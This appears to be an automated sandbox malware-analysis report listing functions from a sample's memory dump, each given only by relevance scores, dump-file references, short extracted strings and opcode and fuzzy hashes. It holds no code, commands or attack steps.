                                                                                              • Instruction ID: b72675b4544aa133a7d9f77a074909bb0b4f7bdac173bbfad46600f6240406a3
                                                                                              • Opcode Fuzzy Hash: 613c9b39458c86d0f513fc7d2d8686fa9934ce366717ed141a0541badea1d58b
                                                                                              • Instruction Fuzzy Hash: C8B209F36082009FE304AE2DEC8577ABBE9EF94720F16893DE6C4C7744EA7558058697
                                                                                              Function 00C996CD Relevance: 2.8, Strings: 2, Instructions: 259COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: \B%z$_p]o
                                                                                              • API String ID: 0-254671472
                                                                                              • Opcode ID: e667d6e2d8052080c70dd7cfd44c5d21c38599091e74c9906654db879c3e7f52
                                                                                              • Instruction ID: fc518bee5d8ede5d5c4a1726d441b6de5e3fd8ce24695523c888e048361e1eec
                                                                                              • Opcode Fuzzy Hash: e667d6e2d8052080c70dd7cfd44c5d21c38599091e74c9906654db879c3e7f52
                                                                                              • Instruction Fuzzy Hash: 8D814CF3E086044FF3046D29EC8576ABBD6EBD4320F1B853DDBC897784D93958058686
                                                                                              Function 00B524E0 Relevance: 2.8, Strings: 2, Instructions: 254COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00B52591
                                                                                              • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00B525D2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                                              • API String ID: 0-2492670020
                                                                                              • Opcode ID: 5419afbd8917b9d97e55c6b7a6cf1fe0edaf741298612a3a55eaa64439e78b53
                                                                                              • Instruction ID: 1b4ac9c38a581cddac8cb78e22f0e7fb3dca643ba869b887c13fa1f05ed79c2c
                                                                                              • Opcode Fuzzy Hash: 5419afbd8917b9d97e55c6b7a6cf1fe0edaf741298612a3a55eaa64439e78b53
                                                                                              • Instruction Fuzzy Hash: B5813933A0A69147CB198B3C9C913A97BD25F6B331F2D83E9DC719B3D5D5688D098350
                                                                                              Function 00B25AC9 Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0$8
                                                                                              • API String ID: 0-46163386
                                                                                              • Opcode ID: 3b6dc4186e3d00bdc9c4e5808dfb6d70e7bb5fff39b01e06dfdbe906dbf3411f
                                                                                              • Instruction ID: 81267730243cf31506b47358d5cb146adea4e7fc5f7a540b7e8565979e8597b0
                                                                                              • Opcode Fuzzy Hash: 3b6dc4186e3d00bdc9c4e5808dfb6d70e7bb5fff39b01e06dfdbe906dbf3411f
                                                                                              • Instruction Fuzzy Hash: D6A12135608780DFD320CF28D844B9EBBE1AB99304F14895CE9C9973A2C779E958CF52
                                                                                              Function 00B2542C Relevance: 2.7, Strings: 2, Instructions: 217COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0$8
                                                                                              • API String ID: 0-46163386
                                                                                              • Opcode ID: 81872ee080777aeaec64e9d190ae58b4fe73c052568320f996c66a1aef48511e
                                                                                              • Instruction ID: 9f20f62158e2d4f812729bf8998edac1fb43786166850eb4977e39c491256a53
                                                                                              • Opcode Fuzzy Hash: 81872ee080777aeaec64e9d190ae58b4fe73c052568320f996c66a1aef48511e
                                                                                              • Instruction Fuzzy Hash: DDA11135608780DFD320CF28D84479ABBE1AB99314F14895CE9C8973A2C775E958CF52
                                                                                              Function 00B2E970 Relevance: 2.6, Strings: 2, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: efg`$efg`
                                                                                              • API String ID: 0-3010568471
                                                                                              • Opcode ID: 874ed1d16e711c954491c6177c3aea931704ecde7248288da98f22d5969e2b48
                                                                                              • Instruction ID: 927e30913ea10a0983a2265dbc7e774f00fbfed0b206ab617aaa72f1b2818431
                                                                                              • Opcode Fuzzy Hash: 874ed1d16e711c954491c6177c3aea931704ecde7248288da98f22d5969e2b48
                                                                                              • Instruction Fuzzy Hash: 6431D232A083608BC328CF51E5A16AFB3D2BBE4300F5A496CD9CA67655CE709D06C7D2
                                                                                              Function 00B48CB0 Relevance: 1.7, Strings: 1, Instructions: 490COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: st@
                                                                                              • API String ID: 0-3741395493
                                                                                              • Opcode ID: e0a10bd0b90c89b8e29cfc0c35bf4520d86d99fbd1bd6e50ead9bc65fa2e9fee
                                                                                              • Instruction ID: 59b498d38a18fcdb708b21f4dada89b2a4ff8f79edbe671dc621e2ab979ef0e2
                                                                                              • Opcode Fuzzy Hash: e0a10bd0b90c89b8e29cfc0c35bf4520d86d99fbd1bd6e50ead9bc65fa2e9fee
                                                                                              • Instruction Fuzzy Hash: 8FF127B150C3918FD3148F24D45176BBBE2EF95308F1888ADE5D587382DB79DA09CB92
                                                                                              Function 00B60F60 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: _^]\
                                                                                              • API String ID: 2994545307-3116432788
                                                                                              • Opcode ID: 1a3cfeb52684befb8c28ad57412dc0f43a97d8d71a45a9e735230848aaa1fe2e
                                                                                              • Instruction ID: 1b150ffa8d2f04e913ff0d60572b306d0ac8c7cc4cd652167ef091c40e2bec69
                                                                                              • Opcode Fuzzy Hash: 1a3cfeb52684befb8c28ad57412dc0f43a97d8d71a45a9e735230848aaa1fe2e
                                                                                              • Instruction Fuzzy Hash: 2381CE356083419BC718DF1CD4A0A2AB7F1FF99710F1989ACE9819B365EB35EC51CB82
                                                                                              Function 00B261A0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,
                                                                                              • API String ID: 0-3772416878
                                                                                              • Opcode ID: 8b04fab32ec0b8383da590e4bd15150657e1dcf751765b097a457d664c512576
                                                                                              • Instruction ID: e7ea250ce0f3f055a8f07503c313d7b795569e32c165a45c1a7206699ff2beee
                                                                                              • Opcode Fuzzy Hash: 8b04fab32ec0b8383da590e4bd15150657e1dcf751765b097a457d664c512576
                                                                                              • Instruction Fuzzy Hash: 4FB146702093819FD321CF58D89061BFBE0AFA9704F444A6DE5D997382D631EA18CBA7
                                                                                              Function 00B5BCE0 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: 5|iL
                                                                                              • API String ID: 2994545307-1880071150
                                                                                              • Opcode ID: 57dd9b77649a71ea8a9ead3c337800055b131ead65fb3d6397d57a29be6661de
                                                                                              • Instruction ID: 319fb915f3ddbb8bd086788de812489efcdfcae858646d1c4abafbd39f9da494
                                                                                              • Opcode Fuzzy Hash: 57dd9b77649a71ea8a9ead3c337800055b131ead65fb3d6397d57a29be6661de
                                                                                              • Instruction Fuzzy Hash: AB71F932B043108BC7149F288C80B6BB7E6EBC5325F198AECED95972A5D775DC468BC1
                                                                                              Function 00C92F9E Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: +k,_
                                                                                              • API String ID: 0-3490772009
                                                                                              • Opcode ID: 7eaa49c6d11b4826319cc81f9db208b3e3df6c9f48f378518566f94b331da487
                                                                                              • Instruction ID: 334da9a3cdd5c9c5aa9c5ab1a3d87fd123313bf319401dfcab0006bc37829bbb
                                                                                              • Opcode Fuzzy Hash: 7eaa49c6d11b4826319cc81f9db208b3e3df6c9f48f378518566f94b331da487
                                                                                              • Instruction Fuzzy Hash: 68617DF3A083145FE304AE2CED85776BBD5EB94310F1B463DDAC9D7744E93999088286
                                                                                              Function 00B2EA38 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: D
                                                                                              • API String ID: 0-2746444292
                                                                                              • Opcode ID: 52849364a9464bacc2d97d89e5c3f87817592d56511edebc9d7ad6cb32f6f318
                                                                                              • Instruction ID: b3c062c223b80b546a254a601f5dfbf0c72626803ecb74ab5d54c96b51c3c4b3
                                                                                              • Opcode Fuzzy Hash: 52849364a9464bacc2d97d89e5c3f87817592d56511edebc9d7ad6cb32f6f318
                                                                                              • Instruction Fuzzy Hash: F45120B05493908AE3208F12D8A575BBBF1FF91B44F20980CE6E91B294D7B58809CF83
                                                                                              Function 00CB771D Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2357497770.0000000000B79000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2357416508.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357432111.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357481743.0000000000B77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357497770.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357768015.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357877981.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2357894543.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_b20000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: S/
                                                                                              • API String ID: 0-4060910936
                                                                                              • Opcode ID: 4d0ffd1425f72cea4e0fbe2a93766a80d480a892e07eef34dd08cf33650fb362
                                                                                              • Instruction ID: 37390e144da5602e9d89182aaa1c8f7738b34ef829da67ecee523db0aaea5f44
